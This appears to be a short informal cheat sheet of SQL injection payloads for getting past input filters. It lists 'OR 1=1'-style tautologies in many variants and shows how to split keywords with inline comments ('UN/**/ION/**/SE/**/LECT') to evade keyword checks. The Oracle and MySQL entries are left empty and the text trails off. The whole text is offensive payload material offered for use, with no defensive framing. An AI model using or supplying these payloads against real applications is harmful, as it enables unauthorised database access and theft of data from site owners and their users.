here or some Simple replacments to Evoid SQL Injection filters
OR '1' = '1'
OR 1 = 1
OR 'unusual' = 'unusual'
OR 'Simple' = 'Sim' + 'ple'
OR 'Simple'= N'simple' # the N dosent make any diffrence
OR 'Simple' > 'S'
OR 'Simple' < 'X' OR 'Simple' LIKE 'Sim%' OR 2 > 1
OR 'Simple' IN ('Simple')
OR 'Simple' BETWEEN 'R' and 'T'
play with spaces or drop them completely
To escape any filter that checks a UNION followed by spaces and then the work SELECT –we can use a C like comment syntax available for most of DB's
UNION /**/ SELECT name…
For ORACLE use:
For MySql use:
UN/**/ION/**/ SE/**/LECT/**
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